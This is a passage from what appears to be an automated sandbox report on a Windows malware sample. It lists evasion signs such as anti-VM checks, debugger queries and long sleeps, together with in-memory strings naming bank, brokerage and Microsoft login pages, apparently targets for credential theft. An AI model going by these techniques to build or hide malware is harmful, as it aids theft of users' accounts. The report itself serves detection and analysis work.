                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Doc 1Z881A080453968203.exe PID: 7492, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeMemory allocated: 1460000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeMemory allocated: 4E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeMemory allocated: 63A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeMemory allocated: 73A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0176096E rdtsc 7_2_0176096E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5234Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2958Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\cttune.exeAPI coverage: 2.9 %
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F1B7A0 FindFirstFileW,FindNextFileW,FindClose,14_2_02F1B7A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nge Transaction PasswordVMware20,11696494690^
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: entralVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20
                Source: F-385HLwx.14.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: cttune.exe, 0000000E.00000002.2600153010.00000000030EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM%hc
                Source: F-385HLwx.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: F-385HLwx.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: F-385HLwx.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctivebrokers.comVMware20,11696494690}
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.comVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696494690x
                Source: F-385HLwx.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: block list test formVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: global block list test formVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: F-385HLwx.14.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: F-385HLwx.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: F-385HLwx.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: F-385HLwx.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: F-385HLwx.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: discord.comVMware20,11696494690f
                Source: F-385HLwx.14.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: F-385HLwx.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: F-385HLwx.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
                Source: F-385HLwx.14.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: F-385HLwx.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n.utiitsl.comVMware20,11696494690h
                Source: F-385HLwx.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: F-385HLwx.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: F-385HLwx.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: ShWVPkMdEfalHck.exe, 0000000F.00000002.2600562201.0000000000D2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: F-385HLwx.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: F-385HLwx.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696494690x
                Source: F-385HLwx.14.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696494690|UE
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ropeVMware20,11696494690
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agement pageVMware20,11696494690
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware20,11696494690
                Source: firefox.exe, 00000010.00000002.2345144750.0000020C47DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
                Source: cttune.exe, 0000000E.00000002.2604915896.0000000008363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,1169649
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0176096E rdtsc 7_2_0176096E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_00417393 LdrLoadDll,7_2_00417393
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B8158 mov eax, dword ptr fs:[00000030h]7_2_017B8158
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726154 mov eax, dword ptr fs:[00000030h]7_2_01726154
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726154 mov eax, dword ptr fs:[00000030h]7_2_01726154
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171C156 mov eax, dword ptr fs:[00000030h]7_2_0171C156
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B4144 mov eax, dword ptr fs:[00000030h]7_2_017B4144
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B4144 mov eax, dword ptr fs:[00000030h]7_2_017B4144
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B4144 mov ecx, dword ptr fs:[00000030h]7_2_017B4144
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B4144 mov eax, dword ptr fs:[00000030h]7_2_017B4144
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B4144 mov eax, dword ptr fs:[00000030h]7_2_017B4144
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01750124 mov eax, dword ptr fs:[00000030h]7_2_01750124
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CA118 mov ecx, dword ptr fs:[00000030h]7_2_017CA118
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CA118 mov eax, dword ptr fs:[00000030h]7_2_017CA118
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CA118 mov eax, dword ptr fs:[00000030h]7_2_017CA118
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CA118 mov eax, dword ptr fs:[00000030h]7_2_017CA118
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E0115 mov eax, dword ptr fs:[00000030h]7_2_017E0115
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov eax, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov ecx, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov eax, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov eax, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov ecx, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov eax, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov eax, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov ecx, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov eax, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE10E mov ecx, dword ptr fs:[00000030h]7_2_017CE10E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017501F8 mov eax, dword ptr fs:[00000030h]7_2_017501F8
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F61E5 mov eax, dword ptr fs:[00000030h]7_2_017F61E5
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E1D0 mov eax, dword ptr fs:[00000030h]7_2_0179E1D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E1D0 mov eax, dword ptr fs:[00000030h]7_2_0179E1D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]7_2_0179E1D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E1D0 mov eax, dword ptr fs:[00000030h]7_2_0179E1D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0179E1D0 mov eax, dword ptr fs:[00000030h]7_2_0179E1D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E61C3 mov eax, dword ptr fs:[00000030h]7_2_017E61C3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E61C3 mov eax, dword ptr fs:[00000030h]7_2_017E61C3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A019F mov eax, dword ptr fs:[00000030h]7_2_017A019F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A019F mov eax, dword ptr fs:[00000030h]7_2_017A019F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A019F mov eax, dword ptr fs:[00000030h]7_2_017A019F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A019F mov eax, dword ptr fs:[00000030h]7_2_017A019F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171A197 mov eax, dword ptr fs:[00000030h]7_2_0171A197
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171A197 mov eax, dword ptr fs:[00000030h]7_2_0171A197
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171A197 mov eax, dword ptr fs:[00000030h]7_2_0171A197
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01760185 mov eax, dword ptr fs:[00000030h]7_2_01760185
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DC188 mov eax, dword ptr fs:[00000030h]7_2_017DC188
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DC188 mov eax, dword ptr fs:[00000030h]7_2_017DC188
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C4180 mov eax, dword ptr fs:[00000030h]7_2_017C4180
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C4180 mov eax, dword ptr fs:[00000030h]7_2_017C4180
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174C073 mov eax, dword ptr fs:[00000030h]7_2_0174C073
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01722050 mov eax, dword ptr fs:[00000030h]7_2_01722050
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A6050 mov eax, dword ptr fs:[00000030h]7_2_017A6050
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B6030 mov eax, dword ptr fs:[00000030h]7_2_017B6030
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171A020 mov eax, dword ptr fs:[00000030h]7_2_0171A020
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171C020 mov eax, dword ptr fs:[00000030h]7_2_0171C020
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173E016 mov eax, dword ptr fs:[00000030h]7_2_0173E016
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173E016 mov eax, dword ptr fs:[00000030h]7_2_0173E016
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173E016 mov eax, dword ptr fs:[00000030h]7_2_0173E016
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173E016 mov eax, dword ptr fs:[00000030h]7_2_0173E016
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A4000 mov ecx, dword ptr fs:[00000030h]7_2_017A4000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C2000 mov eax, dword ptr fs:[00000030h]7_2_017C2000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C2000 mov eax, dword ptr fs:[00000030h]7_2_017C2000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C2000 mov eax, dword ptr fs:[00000030h]7_2_017C2000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C2000 mov eax, dword ptr fs:[00000030h]7_2_017C2000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C2000 mov eax, dword ptr fs:[00000030h]7_2_017C2000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C2000 mov eax, dword ptr fs:[00000030h]7_2_017C2000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C2000 mov eax, dword ptr fs:[00000030h]7_2_017C2000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C2000 mov eax, dword ptr fs:[00000030h]7_2_017C2000
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171C0F0 mov eax, dword ptr fs:[00000030h]7_2_0171C0F0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017620F0 mov ecx, dword ptr fs:[00000030h]7_2_017620F0
